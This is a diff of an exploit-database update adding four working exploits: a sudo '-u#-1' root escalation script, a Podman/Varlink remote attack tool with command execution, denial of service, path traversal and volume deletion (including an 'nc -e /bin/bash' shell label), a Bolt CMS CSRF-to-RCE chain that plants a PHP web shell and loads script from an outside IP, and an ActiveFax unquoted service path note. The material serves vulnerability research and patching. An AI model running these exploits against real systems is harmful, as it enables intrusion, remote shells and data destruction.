DB: 2019-10-16

4 changes to exploits/shellcodes

sudo 1.8.28 - Security Bypass
ActiveFax Server 6.92 Build 0316 - 'ActiveFaxServiceNT' Unquoted Service Path

Podman & Varlink 1.5.1 - Remote Code Execution

Bolt CMS 3.6.10 - Cross-Site Request Forgery

exploits/linux/local/47502.py

@@ -0,0 +1,80 @@
+# Exploit Title : sudo 1.8.28 - Security Bypass
+# Date : 2019-10-15
+# Original Author: Joe Vennix
+# Exploit Author : Mohin Paramasivam
+# Version : Sudo <1.2.28
+# Tested on Linux
+# Credit : Joe Vennix from Apple Information Security found and analyzed the bug
+# Fix : The bug is fixed in sudo 1.8.28
+# CVE : N/A 
+
+'''Check for the user sudo permissions
+
+sudo -l 
+
+User hacker may run the following commands on kali:
+    (ALL, !root) /bin/bash
+
+
+So user hacker can't run /bin/bash as root (!root)
+
+
+User hacker sudo privilege in /etc/sudoers
+
+# User privilege specification
+root    ALL=(ALL:ALL) ALL
+
+hacker ALL=(ALL,!root) /bin/bash
+
+
+With ALL specified, user hacker can run the binary /bin/bash as any user
+
+EXPLOIT: 
+
+sudo -u#-1 /bin/bash
+
+Example : 
+
+hacker@kali:~$ sudo -u#-1 /bin/bash
+root@kali:/home/hacker# id
+uid=0(root) gid=1000(hacker) groups=1000(hacker)
+root@kali:/home/hacker#
+
+Description :
+Sudo doesn't check for the existence of the specified user id and executes the with arbitrary user id with the sudo priv
+-u#-1 returns as 0 which is root's id
+
+and /bin/bash is executed with root permission
+Proof of Concept Code :
+
+How to use :
+python3 sudo_exploit.py
+
+'''
+
+
+#!/usr/bin/python3
+
+import os
+
+#Get current username
+
+username = input("Enter current username :")
+
+
+#check which binary the user can run with sudo
+
+os.system("sudo -l > priv")
+
+
+os.system("cat priv | grep 'ALL' | cut -d ')' -f 2 > binary")
+
+binary_file = open("binary")
+
+binary= binary_file.read()
+
+#execute sudo exploit
+
+print("Lets hope it works")
+
+os.system("sudo -u#-1 "+ binary)

exploits/linux/remote/47500.py

@@ -0,0 +1,302 @@
+# Exploit Title: Podman & Varlink 1.5.1 - Remote Code Execution
+# Exploit Author: Jeremy Brown
+# Date: 2019-10-15
+# Vendor Homepage: https://podman.io/
+# Software Link: dnf install podman or https://github.com/containers/libpod/releases
+# Version: 1.5.1
+# Tested on: Fedora Server 30
+
+#!/usr/bin/python
+# -*- coding: UTF-8 -*-
+#
+# pickletime.py
+#
+# Podman + Varlink Insecure Config Remote Exploit
+#
+# -------
+# Details
+# -------
+#
+# Podman is container engine / platform similar to Docker supported
+# by RedHat and Fedora with Varlink being a protocol to exchange
+# messages, which comes in handy for things like a Remote API.
+#
+# Now depending on how Podman and Varlink are deployed, they can be
+# susceptible to local and remote attacks. There are a few API bugs
+# in Podman itself, as well as a way to execute arbitary commands if
+# one can hit Podman via the Remote API. Running Podman with Varlink
+# over tcp listening either on localhost or the network interface is the
+# most vulnerable setup, but other ways such as access via the local UNIX
+# socket or over SSH (key /w no passphrase is common) aren't likely
+# to be vulnerable unless ACLs or other stuff is broken.
+#
+# ------------------
+# Testing the issues
+# ------------------
+#
+# - check; just connects and issues GetInfo() to see if the host is
+#   running a podman service
+#
+# - exec; arbitrary cmd execution via ContainerRunlabel() specified
+#   by "run" label in the specified hosted image (self-setup)
+#
+# - dos; crash the server via choosing a /random/ selection from
+# 	the available parsing bugs in APIs (we like to have fun here)
+#
+# - blind; dir traversal in SearchImages() API to force server to
+#   read an arbitrary file (no client-side output)
+#
+# - volrm; loops to remove all volumes via VolumeRemove() behavior
+#
+# ---------
+# Exec demo
+# ---------
+#
+# $ ./pickletime.py check podman-host:6000
+# -> Podman service confirmed on host
+#
+# Then create a Dockerfile with an edgy label, build and host it.
+#
+# [Dockerfile]
+# FROM busybox
+# LABEL run=“nc -l -p 10000 -e /bin/bash”
+#
+# $ ./pickletime.py exec podman-host:6000 docker-registry:5000/image run
+# Done!
+#
+# $ nc podman-host 10000
+# ps                             
+#    PID TTY          TIME CMD   
+# 111640 pts/1    00:00:00 bash  
+# 111786 pts/1    00:00:00 podman
+# 111797 pts/1    00:00:00 nc    
+# 111799 pts/1    00:00:00 bash  
+# 111801 pts/1    00:00:00 ps    
+#
+#
+# Tested Podman 1.4.4/1.5.1 and Varlink 18 on Fedora Server 30 x64
+#
+# -----------
+# Other stuff
+# -----------
+#
+# Note: admins can really setup their connection and deployment configuration
+# however they like, so it's hard to say how many folks are 'doing it wrong'
+# or actually are running with proper auth and hardening in place. Shodan
+# folks have been contacted about adding support to discover Varlink services
+# to get more data that way as well.
+#
+# Fixed bugs:
+# - DoS #2 was fixed in 1.5.1
+# - Updated security docs / cli flags TBD
+#
+# > Why pickles? Why not.
+#
+# Dependencies to run this code:
+#
+# sudo dnf install -y python3-podman-api
+#
+#
+#
+
+import os
+import sys
+import socket
+import subprocess
+import random
+import json
+import podman
+import pickle
+import time
+
+serviceName = 'io.podman' # service name
+
+def main():
+	if(len(sys.argv) < 2):
+		print("Usage: %s <action> <host> [action....params]\n" % sys.argv[0])
+		print("Eg:    %s check tcp:podman-host:6000" % sys.argv[0])
+		print("...    %s exec  tcp:podman-host:6000 docker-registry:5000/image run\n" % sys.argv[0])
+		print("Actions: check, exec, dos, blind, volrm\n")
+		return
+
+	action = sys.argv[1]
+	address = sys.argv[2] # eg. unix:/run/podman/io.podman for local testing
+
+	ip = address.split(':')[1]
+	port = int(address.split(':')[2])
+
+	if(action == 'exec'):
+		if(len(sys.argv) < 4):
+			print("Error: need more args for exec")
+			return
+
+		image = sys.argv[3] # 'source' for pull
+		label = sys.argv[4]
+
+	isItTime()
+
+	try:
+		pman = podman.Client(uri=address)
+	except Exception:
+		print("Error: can't connect to host")
+		return
+
+	if(action == 'check'):
+		result = json.dumps(pman.system.info())
+
+		if('podman_version' in result):
+			print("-> Podman service confirmed on host")
+			return
+		
+		print("-!- Podman service was not found on host")
+
+	
+	elif(action == 'exec'):
+		#
+		# First pull the image from the repo, then run the label
+		#
+		try:
+			result = pman.images.pull(image) # PullImage()
+		except Exception as error:
+			pass # call fails sometimes if image already exists which is *ok*
+
+		#
+		# ContainerRunlabel() ... but, no library imp. we'll do it live!
+		#
+		method = serviceName + '.' + 'ContainerRunlabel'
+
+		message = '{\"method\":\"'
+		message += method
+		message += '\",\"parameters\":'
+		message += '{\"Runlabel\":{\"image\":\"'
+		message += image
+		message += '\",\"label\":\"'
+		message += label
+		message += '\"}}}'
+		message += '\0' # end each msg with a NULL byte
+
+		doSocketSend(ip, port, message)
+
+
+	elif(action == 'dos'):
+		#bug = 1 # !fun
+		bug = random.randint(1,2) # fun
+		
+		if(bug == 1):
+			print("one")
+			source = 'test'
+
+			method = serviceName + '.' + 'LoadImage'
+
+			message = '{\"method\":\"'
+			message += method
+			message += '\",\"parameters\":'
+			message += '{\"source":\"'
+			message += source
+			message += '\"}}'
+			message += '\0'
+
+			doSocketSend(ip, port, message)
+
+
+		# works on 1.4.4, fixed in 1.5.1
+		if(bug == 2):
+			print("two")
+
+			reference = 'b' * 238
+			source = '/dev/null' # this file must exist locally
+
+			method = serviceName + '.' + 'ImportImage'
+
+			message = '{\"method\":\"'
+			message += method
+			message += '\",\"parameters\":'
+			message += '{\"reference\":\"'
+			message += reference
+			message += '\",\"source\":\"'
+			message += source
+			message += '\"}}'
+			message += '\0'
+			
+			doSocketSend(ip, port, message)
+
+
+	#
+	# blind read of arbitrary files server-side
+	# ...interesting but not particularly useful by itself
+	#
+	# openat(AT_FDCWD, "/etc/passwd", O_RDONLY|O_CLOEXEC) = 7
+	# lseek(7, 0, SEEK_CUR)             = 0
+	# fstat(7, {st_mode=S_IFREG|0644, st_size=1672, ...}) = 0
+	# read(7, "root:x:0:0:root:/root:/bin/bash\n"..., 4096) = 1672
+	# close(7)
+	#
+	elif(action == 'blind'):
+		method = serviceName + '.' + 'SearchImages'
+		query = '../../../etc/passwd/' # magic '/' at the end
+
+		message = '{\"method\":\"'
+		message += method
+		message += '\",\"parameters\":'
+		message += '{\"query\":\"'
+		message += query
+		message += '\"}}'
+		message += '\0'
+
+		#pman.images.search(query) # unclear why this doesn't work
+		doSocketSend(ip, port, message)
+	
+	#
+	# Not really a bug, but an interesting feature to demo without auth
+	# note: call CreateVolume() a few times beforehand to test the removal
+	#
+	elif(action == 'volrm'):
+		method = serviceName + '.' + 'VolumeRemove'
+		n = 10 # this is probably enough to test, but change as necessary
+		
+		message = '{\"method\":\"'
+		message += method
+		message += '\",\"parameters\":'
+		message += '{\"options\":{\"volumes\":[\"\"]}}}' # empty = alphabetical removal
+		message += '\0'
+
+		for _ in range(n):
+			doSocketSend(ip, port, message)
+			time.sleep(0.5) # server processing time
+
+	print("Done!")
+
+
+#
+# podman/varlink libaries don't support calling these API calls, so native we must
+#
+def doSocketSend(ip, port, message):
+	try:
+		sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+		sock.connect((ip, port))
+		sock.send(message.encode())
+		
+	except Exception as error:
+		print(str(error))
+		return
+		
+	finally:
+		sock.close()
+
+
+#
+# obligatory routine
+#
+def isItTime():
+	tm = time.localtime()
+
+	p = pickle.dumps('it\'s pickle time!')
+
+	if((str(tm.tm_hour) == '11') and (str(tm.tm_min) == '11')):
+		print(pickle.loads(p))
+	else:
+		pass # no dill
+
+
+if(__name__ == '__main__'):
+	main()

exploits/php/webapps/47501.txt

@@ -0,0 +1,368 @@
+# Exploit Title: Bolt CMS 3.6.10 - Cross-Site Request Forgery
+# Date: 2019-10-15
+# Exploit Author: r3m0t3nu11[Zero-Way]
+# Vendor Homepage: https://bolt.cm/
+# Software Link: https://bolt.cm/
+# Version: up to date and 6.5
+# Tested on: Linux
+# CVE : N/A
+
+# last version
+
+# Csrf p0c
+<html>
+  <body>
+  <head>
+Bolt v 3.x exploit 0day
+</head>
+<h1>Bolt v 3.x csrf -> xss -> rce exploit</h1>
+<img src ="
+https://66.media.tumblr.com/8c1e5f1a62191b9091fd8736f8c4810b/tumblr_pf6q303FlE1vgbzx6o1_r1_400.jpg">
+
+<script>
+      function submitRequest()
+      {
+        Csrf = async () => {
+        const xhr = new XMLHttpRequest();
+        xhr.open("POST",
+"http:\/\/127.0.0.1\/index.php\/async\/folder\/create",
+true);
+        xhr.setRequestHeader("Accept", "*\/*");
+        xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
+        xhr.setRequestHeader("Content-Type",
+"application\/x-www-form-urlencoded; charset=UTF-8");
+        xhr.withCredentials = true;
+        var body = "parent=&foldername=sss&namespace=files";
+        var aBody = new Uint8Array(body.length);
+        for (var i = 0; i < aBody.length; i++)
+          aBody[i] = body.charCodeAt(i);
+          xhr.send(new Blob([aBody]));
+        xhr.onreadystatechange = async (e) => {
+        if (xhr.readyState === 4 && xhr.status === 200){
+
+};
+ JSfuck1();
+}
+
+}
+      JSfuck1 = async () => {
+const xhr = new XMLHttpRequest();
+xhr.open("POST", "http:\/\/127.0.0.1\/index.php\/async\/file\/create",
+true);
+xhr.setRequestHeader("Accept", "*\/*");
+xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
+xhr.setRequestHeader("Content-Type", "application\/x-www-form-urlencoded;
+charset=UTF-8");
+xhr.withCredentials = true;
+var body1 = "filename=aaa&parentPath=sss&namespace=files";
+xhr.send(body1);
+xhr.onreadystatechange = async (e) => {
+if (xhr.readyState === 4 && xhr.status === 200){
+
+}
+
+
+};
+where();
+      }
+
+      where = async () => {
+const xhr = new XMLHttpRequest();
+xhr.open("POST", "http:\/\/127.0.0.1\/index.php\/async\/file\/rename",
+true);
+xhr.setRequestHeader("Accept", "*\/*");
+xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
+xhr.setRequestHeader("Content-Type", "application\/x-www-form-urlencoded;
+charset=UTF-8");
+xhr.withCredentials = true;
+var body2 =
+"namespace=files&parent=sss&oldname=aaa&newname=aaa%3Cscript+src%3D'http%3A%26%23x2f%3B%26%23x2f%3B45.63.42.245%26%23x2f%3Bfinal.js'%3C%26%23x2f%3Bscript%3E.jpg";
+xhr.send(body2);
+
+}
+          Csrf();
+      }
+</script>
+    <form action="#">
+      <input type="button" value="Submit request"
+onclick="submitRequest();" />
+    </form>
+  </body>
+</html>
+
+JS p0c
+
+<script>
+Token = async () => {
+var xhr = new XMLHttpRequest();
+xhr.open("GET", "\/index.php\/bolt\/files", true);
+xhr.responseType = "document";
+xhr.withCredentials=true;
+xhr.onreadystatechange = async (e) => {
+if (xhr.readyState === 4 && xhr.status === 200){
+doc = xhr.response;
+token = doc.getElementsByName("file_upload[_token]")[0].value;
+upload(token);
+console.log(token);
+
+}
+};
+xhr.send();
+}
+
+
+
+upload = async (csrfToken) =>{
+var body =
+"-----------------------------190530466613268610451083392867\r\n" +
+         "Content-Disposition: form-data; name=\"file_upload[select][]\";
+filename=\"r3m0t3nu11.txt\"\r\n" +
+          "Content-Type: text/plain\r\n" +
+          "\r\n" +
+          "<?php system($_GET['test']);?>\r\n" +
+          "-----------------------------190530466613268610451083392867\r\n"
++
+          "Content-Disposition: form-data;
+name=\"file_upload[upload]\"\r\n" +
+          "\r\n" +
+          "\r\n" +
+          "-----------------------------190530466613268610451083392867\r\n"
++
+          "Content-Disposition: form-data;
+name=\"file_upload[_token]\"\r\n" +
+          "\r\n" +
+          token
+
+"-----------------------------190530466613268610451083392867--\r\n";
+
+const xhr = new XMLHttpRequest();
+xhr.open("POST", "http:\/\/127.0.0.1\/index.php\/bolt\/files", true);
+xhr.setRequestHeader("Accept",
+"text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8");
+xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
+xhr.setRequestHeader("Content-Type", "multipart\/form-data;
+boundary=---------------------------190530466613268610451083392867");
+xhr.withCredentials = true;
+ xhr.onreadystatechange = async (e) => {
+if (xhr.readyState === 4 && xhr.status === 200){
+  Shell();
+}
+
+};
+
+ var aBody = new Uint8Array(body.length);
+        for (var i = 0; i < aBody.length; i++)
+          aBody[i] = body.charCodeAt(i);
+        xhr.send(new Blob([aBody]));
+
+}
+
+
+Shell = async () => {
+const xhr = new XMLHttpRequest();
+xhr.open("POST", "http:\/\/127.0.0.1/index.php/async/file/rename", true);
+xhr.setRequestHeader("Accept", "*\/*");
+xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
+xhr.setRequestHeader("Content-Type", "application\/x-www-form-urlencoded;
+charset=UTF-8");
+xhr.withCredentials = true;
+xhr.timeout = 4000;
+var body1 =
+"namespace=files&parent=&oldname=r3m0t3nu11.txt&newname=dd%2Fphp-exif-systemasjpg%2Faa%2Fphp-exif-system.php%2Faaa.jpg";
+xhr.send(body1);
+bypass();
+}
+
+bypass = async () => {
+const xhr = new XMLHttpRequest();
+xhr.open("POST", "http:\/\/127.0.0.1/index.php/async/folder/rename", true);
+xhr.setRequestHeader("Accept", "*\/*");
+xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
+xhr.setRequestHeader("Content-Type", "application\/x-www-form-urlencoded;
+charset=UTF-8");
+xhr.withCredentials = true;
+xhr.timeout = 4000;
+var body1 =
+"namespace=files&parent=dd%2Fphp-exif-systemasjpg%2Faa/php-exif-system.php%2f&oldname=aaa.jpg&newname=bypass.php";
+xhr.send(body1);
+bypass2();
+}
+
+bypass2 = async () => {
+const xhr = new XMLHttpRequest();
+xhr.open("POST", "http:\/\/127.0.0.1/index.php/async/folder/rename", true);
+xhr.setRequestHeader("Accept", "*\/*");
+xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
+xhr.setRequestHeader("Content-Type", "application\/x-www-form-urlencoded;
+charset=UTF-8");
+xhr.withCredentials = true;
+xhr.timeout = 4000;
+var body1 =
+"namespace=files&parent=dd%2Fphp-exif-systemasjpg%2Faa/&oldname=php-exif-system.php&newname=bypass1";
+xhr.send(body1);
+
+}
+
+
+
+Token();
+</script>
+
+
+version 6.5
+
+CSrf p0c
+<html>
+  <body>
+<head>
+Bolt v 3.x CVE-2019-17591 exploit
+</head>
+<h1>Bolt v 3.x csrf -> xss -> rce exploit</h1>
+<img src ="
+https://66.media.tumblr.com/8c1e5f1a62191b9091fd8736f8c4810b/tumblr_pf6q303FlE1vgbzx6o1_r1_400.jpg">
+
+<script>
+      function submitRequest()
+      {
+        Csrf = async () => {
+        const xhr = new XMLHttpRequest();
+        xhr.open("POST",
+"http:\/\/bolt-4mti18.bolt.dockerfly.com\/async\/file\/create",
+true);
+        xhr.setRequestHeader("Accept", "*\/*");
+        xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
+        xhr.setRequestHeader("Content-Type",
+"application\/x-www-form-urlencoded; charset=UTF-8");
+        xhr.withCredentials = true;
+        var body = "filename=test&parentPath=&namespace=files";
+        var aBody = new Uint8Array(body.length);
+        for (var i = 0; i < aBody.length; i++)
+          aBody[i] = body.charCodeAt(i);
+          xhr.send(new Blob([aBody]));
+        xhr.onreadystatechange = async (e) => {
+        if (xhr.readyState === 4 && xhr.status === 200){
+          JSfuck();
+}
+};
+
+
+}
+      JSfuck = async () => {
+const xhr = new XMLHttpRequest();
+xhr.open("POST",
+"http:\/\/bolt-4mti18.bolt.dockerfly.com\/async\/file\/rename",
+true);
+xhr.setRequestHeader("Accept", "*\/*");
+xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
+xhr.setRequestHeader("Content-Type", "application\/x-www-form-urlencoded;
+charset=UTF-8");
+xhr.withCredentials = true;
+var body1 = "namespace=files&parent=&oldname=test&newname=<img src='x'
+onerror=alert(1)>";
+xhr.send(body1);
+
+}
+          Csrf();
+      }
+</script>
+    <form action="#">
+      <input type="button" value="Submit request"
+onclick="submitRequest();" />
+    </form>
+  </body>
+</html>
+
+Js p0c
+
+
+<script>
+Token = async () => {
+var xhr = new XMLHttpRequest();
+xhr.open("GET", "\/bolt\/files", true);
+xhr.responseType = "document";
+xhr.withCredentials=true;
+xhr.onreadystatechange = async (e) => {
+if (xhr.readyState === 4 && xhr.status === 200){
+doc = xhr.response;
+token = doc.getElementsByName("file_upload[_token]")[0].value;
+upload(token);
+console.log(token);
+
+}
+
+
+}
+xhr.send(null);
+}
+
+
+
+upload = async (csrfToken) =>{
+var body =
+"-----------------------------190530466613268610451083392867\r\n" +
+         "Content-Disposition: form-data; name=\"file_upload[select][]\";
+filename=\"r3m0t3nu11.txt\"\r\n" +
+          "Content-Type: text/plain\r\n" +
+          "\r\n" +
+          "<?php system($_GET['test']);?>\r\n" +
+          "-----------------------------190530466613268610451083392867\r\n"
++
+          "Content-Disposition: form-data;
+name=\"file_upload[upload]\"\r\n" +
+          "\r\n" +
+          "\r\n" +
+          "-----------------------------190530466613268610451083392867\r\n"
++
+          "Content-Disposition: form-data;
+name=\"file_upload[_token]\"\r\n" +
+          "\r\n" +
+          token
+
+"-----------------------------190530466613268610451083392867--\r\n";
+
+const xhr = new XMLHttpRequest();
+xhr.open("POST", "http:\/\/127.0.0.1\/bolt\/files", true);
+xhr.setRequestHeader("Accept",
+"text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8");
+xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
+xhr.setRequestHeader("Content-Type", "multipart\/form-data;
+boundary=---------------------------190530466613268610451083392867");
+xhr.withCredentials = true;
+xhr.onreadystatechange = async (e) => {
+if (xhr.readyState === 4 && xhr.status === 200){
+Shell();
+}
+};
+      var aBody = new Uint8Array(body.length);
+        for (var i = 0; i < aBody.length; i++)
+          aBody[i] = body.charCodeAt(i);
+        xhr.send(new Blob([aBody]));
+}
+
+
+
+
+Shell = async () => {
+const xhr = new XMLHttpRequest();
+xhr.open("POST", "http:\/\/127.0.0.1/\/async\/file\/rename", true);
+xhr.setRequestHeader("Accept", "*\/*");
+xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
+xhr.setRequestHeader("Content-Type", "application\/x-www-form-urlencoded;
+charset=UTF-8");
+xhr.withCredentials = true;
+var body1 =
+"namespace=files&parent=%2f&oldname=r3m0t3nu11.txt&newname=b.php";
+xhr.send(body1);
+}
+Token();
+</script>
+
+proof of concept :
+
+https://drive.google.com/file/d/1TRjzOM-q8cWK1JA9cN1Auhp7Ao3AXtbp/view?usp=sharing
+
+https://drive.google.com/file/d/1QSE7Dnx0XZth9WciaohjhA6nk_-9jCr1/view?usp=sharing
+
+Greetz to :
+Samir-dz,YokO,0n3,Mr_Hex,syfi2k,Q8Librarian,Dr_hEx,dracula1337,z0mbi3_h4ck3r,Red
+Virus,m7md1337,D3vil1337,and all my friends

exploits/windows/local/47503.txt

@@ -0,0 +1,22 @@
+# Exploit Title : ActiveFax Server 6.92 Build 0316 - 'ActiveFaxServiceNT' Unquoted Service Path
+# Date : 2019-10-15
+# Exploit Author : Cakes
+# Vendor Homepage: https://www.actfax.com/
+# Software Link :  https://www.actfax.com/download/actfax_setup_x64_ge.exe
+# Version : ActiveFax Server 6.92 Build 0316
+# Tested on Windows 10
+# CVE : N/A 
+
+sc qc ActiveFaxServiceNT
+[SC] QueryServiceConfig SUCCESS
+
+SERVICE_NAME: ActiveFaxServiceNT
+        TYPE               : 10  WIN32_OWN_PROCESS 
+        START_TYPE         : 2   AUTO_START
+        ERROR_CONTROL      : 1   NORMAL
+        BINARY_PATH_NAME   : C:\Program Files\ActiveFax\Server\ActSrvNT.exe
+        LOAD_ORDER_GROUP   : 
+        TAG                : 0
+        DISPLAY_NAME       : ActiveFax-Server-Dienst
+        DEPENDENCIES       : 
+        SERVICE_START_NAME : .\Administrator

files_exploits.csv

@@ -10716,6 +10716,8 @@ id,file,description,date,author,type,platform,port
 47482,exploits/linux/local/47482.rb,"ASX to MP3 converter 3.1.3.7 - '.asx' Local Stack Overflow (Metasploit_ DEP Bypass)",2019-10-10,max7253,local,linux,
 47490,exploits/windows/local/47490.txt,"National Instruments Circuit Design Suite 14.0 - Local Privilege Escalation",2019-10-11,"Ivan Marmolejo",local,windows,
 47493,exploits/windows/local/47493.txt,"Uplay 92.0.0.6280 - Local Privilege Escalation",2019-10-14,"Kusol Watchara-Apanukorn",local,windows,
+47502,exploits/linux/local/47502.py,"sudo 1.8.28 - Security Bypass",2019-10-15,"Mohin Paramasivam",local,linux,
+47503,exploits/windows/local/47503.txt,"ActiveFax Server 6.92 Build 0316 - 'ActiveFaxServiceNT' Unquoted Service Path",2019-10-15,cakes,local,windows,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -17713,6 +17715,7 @@ id,file,description,date,author,type,platform,port
 47442,exploits/hardware/remote/47442.py,"Cisco Small Business 220 Series - Multiple Vulnerabilities",2019-09-30,bashis,remote,hardware,
 47456,exploits/windows/remote/47456.rb,"DOUBLEPULSAR - Payload Execution and Neutralization (Metasploit)",2019-10-02,Metasploit,remote,windows,
 47472,exploits/windows/remote/47472.py,"freeFTP 1.0.8 - 'PASS' Remote Buffer Overflow",2019-10-07,"Chet Manly",remote,windows,
+47500,exploits/linux/remote/47500.py,"Podman & Varlink 1.5.1 - Remote Code Execution",2019-10-15,"Jeremy Brown",remote,linux,
 6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@@ -41828,3 +41831,4 @@ id,file,description,date,author,type,platform,port
 47496,exploits/php/webapps/47496.txt,"Express Invoice 7.12 - 'Customer' Persistent Cross-Site Scripting",2019-10-14,"Debashis Pal",webapps,php,
 47497,exploits/python/webapps/47497.py,"Ajenti 2.1.31 - Remote Code Execution",2019-10-14,"Jeremy Brown",webapps,python,
 47498,exploits/php/webapps/47498.txt,"Kirona-DRS 5.5.3.5 - Information Disclosure",2019-10-14,Ramikan,webapps,php,
+47501,exploits/php/webapps/47501.txt,"Bolt CMS 3.6.10 - Cross-Site Request Forgery",2019-10-15,r3m0t3nu11,webapps,php,